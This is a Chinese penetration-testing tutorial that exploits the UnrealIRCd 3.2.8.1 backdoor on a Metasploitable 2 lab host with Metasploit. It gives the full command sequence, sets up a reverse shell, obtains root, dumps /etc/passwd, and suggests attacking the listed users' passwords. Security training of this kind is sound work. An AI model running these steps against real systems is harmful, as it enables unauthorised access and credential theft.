【实例4-3】在MSF终端实现渗透攻击Unreal IRC服务。本例中选择使用Metasploit 2系统作为攻击目标,其地址为192.168.6.105。具体操作步骤如下所示:
(1)启动MSF终端。执行命令如下所示:
root@kali:~# msfconsole
msf>
执行以上命令后,看到msf>提示符表示已成功登录MSF终端。
(2)查询Unreal 3.2.8.1可利用的模块。执行命令如下所示:
msf > search Unreal 3.2.8.1
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- --------------- ---------------------------
exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Win32)
从输出的信息中,可以看到有三个可利用的模块。本例中选择使用unreal_ircd_3281_backdoor模块,该模块的级别非常好。
(3)查看unreal_ircd_3281_backdoor模块,可渗透攻击的详细信息。执行命令如下所示:
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution Module: exploit/unix/irc/unreal_ircd_3281_backdoor Platform: Unix Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: hdm <hdm@metasploit.com> Available targets: Id Name -- ---- 0 Automatic Target Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port Payload information: Space: 1024 Description: This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. References: http://cvedetails.com/cve/2010-2075/ http://www.osvdb.org/65445 http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt |
从输出的信息中,可以看到关于unreal_ircd_3281_backdoor模块的详细信息。其中,包括模块支持的平台、权限、提供商、基本选项设置及描述信息等。
(4)选择使用unreal_ircd_3281_backdoor模块,并查看该模块可配置的选项参数。执行命令如下所示:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
从输出信息中,可以看到有两个必须配置的选项参数。其中RPORT选项已经配置,接下来还需要配置RHOST选项。
(5)配置RHOST选项参数。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105
RHOST => 192.168.6.105
从输出信息中,可以看到使用目标主机的地址为192.168.6.105。
(6)查看所有可利用的攻击载荷。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
------------------------------------ ------------------------ ------------- -----------------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
输出的信息显示了,在unreal_ircd_3281_backdoor模块中可加载的攻击载荷。从输出模块的描述信息,可以看到这些攻击载荷都是命令行Shell。这样就不能进入Meterpreter shell了,而且现在只能使用反Shell。当成功攻击目标主机后,在终端Shell的权限也会降低。
(7)使用反Shell,攻击目标主机。选择加载reverse攻击载荷,并查看该载荷下可配置的选项参数。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.6.105 yes The target address
RPORT 6667 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
从输出的结果中,可以看到LHOST选项参数未配置。
(8)配置LHOST选项参数。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103
LHOST => 192.168.6.103
执行以上命令后,再次查看所有选项参数的配置情况。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.6.105 yes The target address
RPORT 6667 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.6.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
从输出的信息中,可以看到所有选项都以配置。接下来就可以进行攻击了。
(9)启动渗透攻击。执行命令如下所示:
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.6.105:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4G58mrIzlfNG2zIm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4G58mrIzlfNG2zIm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800
从输出的信息中,可以看到成功打开了一个会话。但是没有进入任何Shell的提示符,只有一个闪烁的光标。这表示连接到目标主机的一个终端Shell,此时可以执行任何标准的Linux命令。例如,查看目标系统当前登录的用户名,执行命令如下所示:
whoami
执行以上命令后,将显示如下所示的信息:
root
从输出的信息可以看到当前登录的用户是超级用户root。
如想查看目标系统的密码文件,执行命令如下所示:
cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false snmp:x:115:65534::/var/lib/snmp:/bin/false |
输出信息显示了,目标系统中所有的用户信息。用户可以根据这些信息攻击目标主机上用户的密码。